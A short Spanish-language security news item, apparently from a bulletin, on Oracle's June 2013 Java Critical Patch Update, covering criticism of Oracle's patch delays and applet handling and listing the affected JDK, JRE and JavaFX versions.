A Oracle le han llovido las críticas, en materia de seguridad, debido sobre todo a la demora en la publicación de parches, a no mantener una política de seguridad proactiva respecto a la búsqueda de fallos en su plataforma o la permisividad con la que se ejecutaban los applets. En cada actualización se seguridad Oracle ha ido restringiendo la ejecución de applets. Desde la eliminación de la opción "baja" en el nivel de seguridad hasta la prohibición de applets no firmados o autofirmados.

Las versiones afectadas son:

JDK y JRE 7 update 21 y anteriores.
JDK y JRE 6 update 45 y anteriores.
JDK y JRE 5.0 update 45 y anteriores.
JavaFX 2.2.21 y anteriores.

Más información:

Oracle Java SE Critical Patch Update Pre-Release Announcement - June 2013

Maintaining the security-worthiness of Java is Oracle’s priority



David García

Antonio Sánchez